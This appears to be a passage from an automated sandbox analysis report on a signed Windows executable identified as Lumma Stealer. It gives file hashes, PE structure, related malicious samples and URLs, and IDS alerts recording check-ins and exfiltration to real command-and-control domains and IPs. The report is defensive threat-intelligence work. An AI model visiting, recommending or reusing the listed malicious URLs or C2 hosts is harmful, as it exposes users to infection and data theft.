                                                                                                                                                                                                                                    • 23.43.121.120
                                                                                                                                                                                                                                    https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.116.245.16
                                                                                                                                                                                                                                    https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.232.25.148
                                                                                                                                                                                                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.235.101.204
                                                                                                                                                                                                                                    https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                    • 23.195.39.65
                                                                                                                                                                                                                                    Documento_Contrato_Seguro_44600862.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                    • 2.22.50.131
                                                                                                                                                                                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 184.85.177.135
                                                                                                                                                                                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.232.31.180
                                                                                                                                                                                                                                    sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    CLOUDFLARENETUSsldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                                                    jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                                                    Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                    • 172.65.251.78
                                                                                                                                                                                                                                    YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.16.124.96
                                                                                                                                                                                                                                    http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.18.86.42
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.21.23.76
                                                                                                                                                                                                                                    https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.20.7.133
                                                                                                                                                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                    • 104.29.213.135
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.21.2.110
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.21.23.76

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    MeP66xi1AM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    • 45.77.249.79

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                    No created / dropped files found

                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):6.350733016938632
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:ardware-v1.exe
                                                                                                                                                                                                                                    File size:3'487'960 bytes
                                                                                                                                                                                                                                    MD5:c491ddba2ee7516cfc5d5b57ece509a2
                                                                                                                                                                                                                                    SHA1:c0d068660dd74e890bf653a5c839e32314f6bca3
                                                                                                                                                                                                                                    SHA256:1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
                                                                                                                                                                                                                                    SHA512:e7cafad543df242d76230c678d6beb9c8a00db2c8ede995cfe459bea3f996b3395db55736f203d5e22e5ad72fe72c8737d251ffcd3cd166c2e91b65a1a5484f1
                                                                                                                                                                                                                                    SSDEEP:98304:832g6KeR8WvRXOE4yPaKDZ4UmyYl3RbB9p6pkYiXe6/hDDV1h2Yq0W/cVA:7lKeRDRXiOZ4U9E3hrU6YiXjDp2iA
                                                                                                                                                                                                                                    TLSH:70F58E3C414ACE8DE74BE169228717CF38ED60B6C54FB58393C8E898ED5398C98AC557
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KY6.*7e.*7e.*7e.R4d.*7e.R2dL*7e.R3d.*7e..4d.*7e..3d.*7e..2d.*7e.R6d.*7e.*6e.*7eZ.?d.*7eZ..e.*7eZ.5d.*7eRich.*7e........PE..L..

                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                    Icon Hash:5f796dd6ccd96926

                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Entrypoint:0x6e4200
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x67600960 [Mon Dec 16 11:05:04 2024 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:5b1cbf5ac6f122fc95a4de1a12dcfae0

                                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                                    Signature Valid:true
                                                                                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                    Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                    Error Number:0
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 22/10/2024 20:00:00 23/10/2025 19:59:59
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, O=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, S=\u6c5f\u897f\u7701, C=CN, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=92360902MADYXP3F14
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:03E83BDACA900DD003355CC8E662D9FA
                                                                                                                                                                                                                                    Thumbprint SHA-1:CBF33B2C384509341A4D74C25B332DF2DF82B494
                                                                                                                                                                                                                                    Thumbprint SHA-256:522EC7DC5080E18BE2C2BDFEF1594B4167CD57D620ADEA28FF407784A49A3497
                                                                                                                                                                                                                                    Serial:334A8DC7BE701421BB5A00FEFCB26F50

                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                    call 00007FAEE450E35Dh
                                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                                                                    call dword ptr [0071400Ch]
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call dword ptr [00714008h]
                                                                                                                                                                                                                                    push C0000409h
                                                                                                                                                                                                                                    call dword ptr [00714010h]
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    call dword ptr [00714014h]
                                                                                                                                                                                                                                    nop
                                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                    sub esp, 00000324h
                                                                                                                                                                                                                                    push 00000017h
                                                                                                                                                                                                                                    call dword ptr [00714018h]
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007FAEE450E659h
                                                                                                                                                                                                                                    mov ecx, 00000002h
                                                                                                                                                                                                                                    int 29h
                                                                                                                                                                                                                                    mov dword ptr [00723AD0h], eax
                                                                                                                                                                                                                                    mov dword ptr [00723ACCh], ecx
                                                                                                                                                                                                                                    mov dword ptr [00723AC8h], edx
                                                                                                                                                                                                                                    mov dword ptr [00723AC4h], ebx
                                                                                                                                                                                                                                    mov dword ptr [00723AC0h], esi
                                                                                                                                                                                                                                    mov dword ptr [00723ABCh], edi
                                                                                                                                                                                                                                    mov word ptr [00723AE8h], ss
                                                                                                                                                                                                                                    mov word ptr [00723ADCh], cs
                                                                                                                                                                                                                                    mov word ptr [00723AB8h], ds
                                                                                                                                                                                                                                    mov word ptr [00723AB4h], es
                                                                                                                                                                                                                                    mov word ptr [00723AB0h], fs
                                                                                                                                                                                                                                    mov word ptr [00723AACh], gs
                                                                                                                                                                                                                                    pushfd
                                                                                                                                                                                                                                    pop dword ptr [00723AE0h]
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                    mov dword ptr [00723AD4h], eax
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                    mov dword ptr [00723AD8h], eax
                                                                                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                    mov dword ptr [00723AE4h], eax

                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x32238c0x28.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3250000xeb55.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x34ee000x4ad8
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3340000x1e1c4.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3216e00x54.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3216200x40.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3140000x118.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x31265a0x31280078205e5871918b833f6f9ddbca7a51e6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x3140000xe9d80xea005168e2efcb56f21388167389be17cb99False0.3250868055555556data4.593908806113169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0x3230000x1b800xa00ac347fa16904e0c00d845293aa065859False0.21328125data2.5718746421367604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x3250000xeb550xec00aa6b34ce96afaf2bbbcc9abeddfe13b7False0.8014929819915254data6.91975740920949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x3340000x1e1c40x1e200fa9cecbf249aa3bf5c0b36b41962e84aFalse0.7237827411825726data6.844856432656225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x3256280x9ae0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9888771186440678
                                                                                                                                                                                                                                    RT_MENU0x32f1080x29cdata0.5703592814371258
                                                                                                                                                                                                                                    RT_DIALOG0x32f3a40x344data0.5418660287081339
                                                                                                                                                                                                                                    RT_DIALOG0x32f6e80x2a0data0.5580357142857143
                                                                                                                                                                                                                                    RT_DIALOG0x32f9880x368data0.5263761467889908
                                                                                                                                                                                                                                    RT_DIALOG0x32fcf00x3c4data0.5072614107883817
                                                                                                                                                                                                                                    RT_DIALOG0x3300b40x4fcdata0.5047021943573667
                                                                                                                                                                                                                                    RT_DIALOG0x3305b00x35cdata0.5395348837209303
                                                                                                                                                                                                                                    RT_DIALOG0x33090c0x2d0data0.55
                                                                                                                                                                                                                                    RT_DIALOG0x330bdc0x31cdata0.5527638190954773
                                                                                                                                                                                                                                    RT_DIALOG0x330ef80x2e0data0.5679347826086957
                                                                                                                                                                                                                                    RT_DIALOG0x3311d80x4d4data0.4919093851132686
                                                                                                                                                                                                                                    RT_DIALOG0x3316ac0x308data0.5476804123711341
                                                                                                                                                                                                                                    RT_DIALOG0x3319b40x3fcdata0.538235294117647
                                                                                                                                                                                                                                    RT_STRING0x331db00x3cdata0.65
                                                                                                                                                                                                                                    RT_STRING0x331dec0x180data0.5911458333333334
                                                                                                                                                                                                                                    RT_STRING0x331f6c0x190data0.6025
                                                                                                                                                                                                                                    RT_STRING0x3320fc0x178data0.6090425531914894
                                                                                                                                                                                                                                    RT_STRING0x3322740x170data0.6195652173913043
                                                                                                                                                                                                                                    RT_STRING0x3323e40x190data0.605
                                                                                                                                                                                                                                    RT_STRING0x3325740x188data0.6071428571428571
                                                                                                                                                                                                                                    RT_STRING0x3326fc0x1a8data0.5943396226415094
                                                                                                                                                                                                                                    RT_STRING0x3328a40x190AmigaOS bitmap font "a", fc_YSize 25088, 22784 elements, 2nd "t", 3rd0.595
                                                                                                                                                                                                                                    RT_STRING0x332a340xbcdata0.6595744680851063
                                                                                                                                                                                                                                    RT_MESSAGETABLE0x332af00x498Matlab v4 mat-file (little endian) I, rows 55, columns 57, imaginary0.4923469387755102
                                                                                                                                                                                                                                    RT_MESSAGETABLE0x332f880x550Matlab v4 mat-file (little endian) I, rows 54, columns 57, imaginary0.4838235294117647
                                                                                                                                                                                                                                    RT_MESSAGETABLE0x3334d80x4ecMatlab v4 mat-file (little endian) \211, rows 116, columns 121, imaginary0.4936507936507937
                                                                                                                                                                                                                                    RT_GROUP_ICON0x3339c40x14data1.1
                                                                                                                                                                                                                                    RT_MANIFEST0x3339d80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    KERNEL32.dllVirtualProtect, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateFileW

                                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                    2024-12-18T09:52:24.101138+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.5515141.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:25.103064+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.5515141.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:27.405887+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.54985845.77.249.79443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:27.405887+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54985845.77.249.79443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:27.407240+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.549858TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:28.314598+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.54985845.77.249.79443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:28.314598+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.54985845.77.249.79443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:28.318715+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.5613771.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:29.304741+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.5613771.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.002104+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.549869104.131.68.180443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.002104+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549869104.131.68.180443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.004078+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1104.131.68.180443192.168.2.549869TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.418623+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549869104.131.68.180443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.418623+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549869104.131.68.180443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.439534+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.5542851.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.751951+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.5499241.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:31.982468+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.5510441.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:32.204519+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.5568421.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:32.607672+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.5550311.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:32.832362+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.5612351.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-18T09:52:34.686184+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54987923.55.153.106443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:35.623619+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54987923.55.153.106443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:37.376405+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549886172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:38.082760+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549886172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:38.082760+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549886172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:39.453862+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549892172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:40.496208+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549892172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:40.496208+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549892172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:42.080645+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549899172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:42.809344+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549899172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:44.116781+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549905172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:48.083642+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549915172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:51.363600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549922172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:54.488685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549932172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:54.496050+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549932172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:59.111699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549943172.67.157.254443TCP
                                                                                                                                                                                                                                    2024-12-18T09:52:59.855849+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549943172.67.157.254443TCP

                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.571400881 CET49858443192.168.2.545.77.249.79
